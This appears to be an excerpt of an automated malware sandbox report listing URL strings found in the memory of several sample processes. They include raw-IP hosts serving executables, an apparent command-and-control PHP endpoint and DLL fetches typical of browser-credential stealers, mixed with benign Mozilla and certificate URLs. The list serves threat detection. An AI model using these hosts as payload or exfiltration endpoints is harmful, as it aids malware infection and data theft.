Source: skotes.exe, 00000006.00000002.2981894572.000000000124A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/luma/random.exey
Source: c4df60870c.exe, 0000000A.00000002.2959179677.000000000019C000.00000040.00000001.01000000.0000000B.sdmp, c4df60870c.exe, 0000000A.00000002.2959179677.00000000003DE000.00000040.00000001.01000000.0000000B.sdmp, c4df60870c.exe, 0000000A.00000002.2974865414.0000000001169000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exe
Source: c4df60870c.exe, 0000000A.00000002.2974865414.0000000001169000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exe)
Source: c4df60870c.exe, 0000000A.00000002.2959179677.000000000019C000.00000040.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exe00Start5JECAAAFHIJKFIJEGC0d329yZSBPbGR8MXxcQml0Y29pblx8KndhbGxl
Source: c4df60870c.exe, 0000000A.00000002.2974865414.0000000001169000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exe5
Source: c4df60870c.exe, 0000000A.00000002.2974865414.0000000001181000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exe6
Source: c4df60870c.exe, 0000000A.00000002.2974865414.0000000001169000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exe;
Source: c4df60870c.exe, 0000000A.00000002.2974865414.0000000001181000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exeE=
Source: c4df60870c.exe, 0000000A.00000002.2974865414.0000000001169000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exeJDAFHJDGDHJKKEGI
Source: c4df60870c.exe, 0000000A.00000002.2974865414.0000000001181000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exeata
Source: c4df60870c.exe, 0000000A.00000002.2974865414.0000000001181000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exeq=7
Source: c4df60870c.exe, 0000000A.00000002.2959179677.00000000003DE000.00000040.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exesposition:
Source: c4df60870c.exe, 0000000A.00000002.2974865414.0000000001181000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exet
Source: 0d287ea527.exe, 00000009.00000003.2825831566.000000000075C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/nm
Source: 0d287ea527.exe, 00000009.00000002.2925749591.0000000000706000.00000004.00000020.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000002.2978043891.0000000001159000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exe
Source: 0d287ea527.exe, 00000009.00000002.2921974449.00000000001DA000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exe.exe
Source: 0d287ea527.exe, 00000012.00000002.2978043891.0000000001159000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exeN
Source: skotes.exe, 00000006.00000002.2981894572.00000000011C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/random.exe
Source: 0d287ea527.exe, 00000009.00000003.2825831566.000000000075C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/q
Source: skotes.exe, 00000006.00000002.2981894572.000000000124A000.00000004.00000020.00020000.00000000.sdmp, 0d287ea527.exe, 0d287ea527.exe, 00000009.00000003.2825831566.000000000075C000.00000004.00000020.00020000.00000000.sdmp, 0d287ea527.exe, 00000009.00000003.2852947773.0000000000760000.00000004.00000020.00020000.00000000.sdmp, 0d287ea527.exe, 00000009.00000002.2925749591.0000000000706000.00000004.00000020.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000002.2978043891.00000000010FA000.00000004.00000020.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000002.2959363875.00000000008DA000.00000004.00000010.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000002.2978043891.0000000001106000.00000004.00000020.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000002.2978043891.0000000001159000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exe
Source: skotes.exe, 00000006.00000002.2981894572.000000000124A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exe.
Source: skotes.exe, 00000006.00000002.2981894572.000000000124A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/well/random.exe
Source: skotes.exe, 00000006.00000002.2981894572.000000000124A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/well/random.exeS
Source: 0d287ea527.exe, 00000012.00000002.2978043891.00000000010E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16:80/steam/random.exe
Source: c4df60870c.exe, 0000000A.00000002.2959179677.0000000000256000.00000040.00000001.01000000.0000000B.sdmp, c4df60870c.exe, 0000000A.00000002.2974865414.000000000110E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206
Source: c4df60870c.exe, 0000000A.00000002.2974865414.0000000001169000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/
Source: c4df60870c.exe, 0000000A.00000002.2959179677.0000000000284000.00000040.00000001.01000000.0000000B.sdmp, c4df60870c.exe, 0000000A.00000002.2974865414.0000000001156000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
Source: c4df60870c.exe, 0000000A.00000002.2974865414.0000000001156000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php=Z
Source: c4df60870c.exe, 0000000A.00000002.2974865414.0000000001156000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpA
Source: c4df60870c.exe, 0000000A.00000002.2974865414.000000000110E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpSession
Source: c4df60870c.exe, 0000000A.00000002.2974865414.0000000001181000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/746f34465cf17784/freebl3.dll
Source: c4df60870c.exe, 0000000A.00000002.2974865414.0000000001181000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/746f34465cf17784/mozglue.dll
Source: c4df60870c.exe, 0000000A.00000002.2974865414.0000000001156000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/746f34465cf17784/msvcp140.dll
Source: c4df60870c.exe, 0000000A.00000002.2974865414.0000000001156000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/746f34465cf17784/msvcp140.dll:7d
Source: c4df60870c.exe, 0000000A.00000002.2974865414.0000000001181000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/746f34465cf17784/nss3.dll:
Source: c4df60870c.exe, 0000000A.00000002.2974865414.0000000001181000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/746f34465cf17784/nss3.dllt
Source: c4df60870c.exe, 0000000A.00000002.2974865414.0000000001156000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/746f34465cf17784/softokn3.dll
Source: c4df60870c.exe, 0000000A.00000002.2959179677.0000000000284000.00000040.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://185.215.113.206/746f34465cf17784/sqlite3.dll
Source: c4df60870c.exe, 0000000A.00000002.2974865414.0000000001181000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/746f34465cf17784/vcruntime140.dll
Source: c4df60870c.exe, 0000000A.00000002.2974865414.0000000001181000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/746f34465cf17784/vcruntime140.dll=8m
Source: c4df60870c.exe, 0000000A.00000002.2974865414.0000000001181000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/746f34465cf17784/vcruntime140.dll=9m
Source: c4df60870c.exe, 0000000A.00000002.2974865414.0000000001181000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/746f34465cf17784/vcruntime140.dllE
Source: skotes.exe, 00000006.00000002.2981894572.000000000128D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
Source: skotes.exe, 00000006.00000002.2981894572.000000000124A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php&
Source: skotes.exe, 00000006.00000002.2981894572.0000000001235000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php4157001
Source: skotes.exe, 00000006.00000002.2981894572.000000000128D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpW
Source: skotes.exe, 00000006.00000002.2981894572.000000000121E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php_
Source: skotes.exe, 00000006.00000002.2981894572.000000000124A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpak$
Source: skotes.exe, 00000006.00000002.2981894572.000000000124A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpcodedG$
Source: skotes.exe, 00000006.00000002.2981894572.000000000124A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpdedb$I6
Source: skotes.exe, 00000006.00000002.2981894572.000000000124A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncoded
Source: skotes.exe, 00000006.00000002.2981894572.000000000124A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncoded3$
Source: skotes.exe, 00000006.00000002.2981894572.000000000124A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncoded~$
Source: skotes.exe, 00000006.00000002.2981894572.0000000001235000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpnu
Source: skotes.exe, 00000006.00000002.2981894572.000000000124A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpt
Source: skotes.exe, 00000006.00000002.2981894572.000000000121E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/freecam.exe
Source: skotes.exe, 00000006.00000002.2981894572.000000000121E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/freecam.exe0623
Source: skotes.exe, 00000006.00000002.2981894572.000000000121E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/freecam.exehp
Source: freecam.exe, 00000007.00000002.2669978281.0000000000968000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://beego.me/docs/advantage/monitor.md
Source: freecam.exe, 00000007.00000002.2669978281.0000000000968000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://beego.me/docs/module/toolbox.md
Source: 0d287ea527.exe, 00000009.00000003.2593713005.00000000051E9000.00000004.00000800.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000003.2767455140.00000000058E3000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2766629692.0000000004FA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: 0d287ea527.exe, 00000009.00000003.2593713005.00000000051E9000.00000004.00000800.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000003.2767455140.00000000058E3000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2766629692.0000000004FA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: firefox.exe, 0000001A.00000002.2849549835.0000028C9737C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%shttp://www.inbox.lv/rfc2368/?value=%s
Source: firefox.exe, 0000001A.00000002.2863474387.0000028C992A7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%ss
Source: 0d287ea527.exe, 00000009.00000003.2544962770.0000000000728000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.m
Source: 0d287ea527.exe, 00000009.00000003.2593713005.00000000051E9000.00000004.00000800.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000003.2767455140.00000000058E3000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2766629692.0000000004FA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: 0d287ea527.exe, 00000009.00000003.2593713005.00000000051E9000.00000004.00000800.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000003.2767455140.00000000058E3000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2766629692.0000000004FA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: 0d287ea527.exe, 00000009.00000003.2593713005.00000000051E9000.00000004.00000800.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000003.2767455140.00000000058E3000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2766629692.0000000004FA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: 0d287ea527.exe, 00000009.00000003.2593713005.00000000051E9000.00000004.00000800.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000003.2767455140.00000000058E3000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2766629692.0000000004FA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: 0d287ea527.exe, 00000009.00000003.2593713005.00000000051E9000.00000004.00000800.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000003.2767455140.00000000058E3000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2766629692.0000000004FA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: firefox.exe, 0000001A.00000002.2877364701.0000028C9B5E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2904727033.0000028C9E467000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com/canonical.html
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv4
Source: firefox.exe, 0000001A.00000002.2918738618.0000028CA30E6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2918738618.0000028CA30A3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv6
Source: firefox.exe, 0000001A.00000002.2883449828.0000028C9CC21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.addEventListener
Source: firefox.exe, 0000001A.00000002.2883449828.0000028C9CC21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.removeEventListener
Source: firefox.exe, 0000001A.00000002.2845203762.0000028C96961000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/dates-and-times
Source: firefox.exe, 0000001A.00000002.2845203762.0000028C96961000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/regular-expressions
Source: firefox.exe, 0000001A.00000002.2842783233.0000028C8B003000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/stringsp
Source: 0d287ea527.exe, 00000009.00000003.2907843178.00000000051CB000.00000004.00000800.00020000.00000000.sdmp, 0d287ea527.exe, 00000009.00000002.2947697899.00000000051CE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://go.microsoft.
Source: firefox.exe, 0000001A.00000003.2816878360.0000028C9E6E5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2897988038.0000028C9D452000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2901087823.0000028C9D95D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2869413990.0000028C9AC03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2902024401.0000028C9DA6D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2888207063.0000028C9CF03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2870458639.0000028C9AE07000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2870458639.0000028C9AE3B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2918738618.0000028CA3025000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2902024401.0000028C9DAA2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2878430278.0000028C9B734000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2875652476.0000028C9B3E0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2848761105.0000028C972C5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2910633665.0000028C9EEDB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2909177907.0000028C9E965000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2908273468.0000028C9E7DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2897407286.0000028C9D38C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2883449828.0000028C9CC21000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2735664166.0000028C9B1D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: 0d287ea527.exe, 00000009.00000003.2593713005.00000000051E9000.00000004.00000800.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000003.2767455140.00000000058E3000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2766629692.0000000004FA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: 0d287ea527.exe, 00000009.00000003.2593713005.00000000051E9000.00000004.00000800.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000003.2767455140.00000000058E3000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2766629692.0000000004FA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: firefox.exe, 0000001A.00000002.2849549835.0000028C9737C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 0000001A.00000002.2863474387.0000028C992A7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%sw
Source: firefox.exe, 0000001A.00000002.2849549835.0000028C9737C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 0000001A.00000002.2863474387.0000028C992A7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%sy
Source: firefox.exe, 0000001A.00000002.2863474387.0000028C992A7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%su
Source: BitLockerToGo.exe, 00000015.00000003.2816159407.0000000002AE2000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2925181917.0000000002B3A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2722310337.0000000002AE2000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2921888267.0000000002AE2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.c
Source: c4df60870c.exe, 0000000A.00000002.3022164511.000000006BF0D000.00000002.00000001.01000000.0000001C.sdmp	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: firefox.exe, 0000001A.00000002.2897988038.0000028C9D443000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
Source: firefox.exe, 0000001A.00000002.2849549835.0000028C9739E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul.popup-notification-description
Source: firefox.exe, 0000001A.00000002.2849549835.0000028C973E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul:scope
Source: firefox.exe, 0000001A.00000002.2849549835.0000028C973E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulchrome://global/content/elements/browse
Source: firefox.exe, 0000001A.00000002.2849549835.0000028C9737C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulchrome://global/content/elements/moz-bu
Source: firefox.exe, 0000001A.00000002.2849549835.0000028C973E0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2849549835.0000028C9739E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulhttp://www.mozilla.org/keymaster/gateke
Source: firefox.exe, 0000001A.00000002.2849549835.0000028C973E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulhttps://merino.services.mozilla.com/api
Source: firefox.exe, 0000001A.00000002.2849549835.0000028C9739E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xuloncommand=closebuttoncommand
Source: firefox.exe, 0000001A.00000002.2849549835.0000028C9739E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulresource://gre/modules/ContextualIdenti
Source: firefox.exe, 0000001A.00000002.2849549835.0000028C973E0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2849549835.0000028C9737C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulsrc=image
Source: c4df60870c.exe, 0000000A.00000002.3011320800.000000001D8AC000.00000004.00000020.00020000.00000000.sdmp, c4df60870c.exe, 0000000A.00000002.3020535078.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: 0d287ea527.exe, 00000009.00000003.2593713005.00000000051E9000.00000004.00000800.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000003.2767455140.00000000058E3000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2766629692.0000000004FA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: 0d287ea527.exe, 00000009.00000003.2593713005.00000000051E9000.00000004.00000800.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000003.2767455140.00000000058E3000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2766629692.0000000004FA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://%LOCALE%.malware-error.mozilla.com/?url=
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://%LOCALE%.phish-error.mozilla.com/?url=
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://%LOCALE%.phish-report.mozilla.com/?url=
Source: firefox.exe, 0000001A.00000003.2714052213.0000028C9AE3C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2860413148.0000028C988E0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2849549835.0000028C9737C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2713884695.0000028C9AE1F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2715980139.0000028C9AE5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.duckduckgo.com/ac/
Source: 0d287ea527.exe, 00000009.00000003.2565798441.00000000051CA000.00000004.00000800.00020000.00000000.sdmp, 0d287ea527.exe, 00000009.00000003.2565425414.00000000051DF000.00000004.00000800.00020000.00000000.sdmp, 0d287ea527.exe, 00000009.00000003.2565653231.00000000051CA000.00000004.00000800.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000003.2722580253.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2723873605.0000000004FB9000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2723631868.0000000004FBB000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2724193570.0000000004FB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: firefox.exe, 0000001A.00000002.2884703213.0000028C9CD4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://account.bellmedia.ca
Source: firefox.exe, 0000001A.00000002.2884703213.0000028C9CD4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://account.bellmedia.caget
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2849549835.0000028C973E0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2863474387.0000028C992A7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.firefox.com/
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://accounts.firefox.com/settings/clients
Source: firefox.exe, 0000001A.00000002.2904727033.0000028C9E467000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2894599404.0000028C9D1A7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 0000001A.00000002.2846282370.0000028C96AF5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2863474387.0000028C992E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/%APP%/blocked-addon/%addonID%/%addonVersion%/
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/language-tools/
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search-engines/
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search?q=%TERMS%&platform=%OS%&appver=%VERSION%
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/themes
Source: firefox.exe, 0000001A.00000002.2884703213.0000028C9CD06000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2883449828.0000028C9CC21000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2884703213.0000028C9CD0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ads.stickyadstv.com/firefox-etp
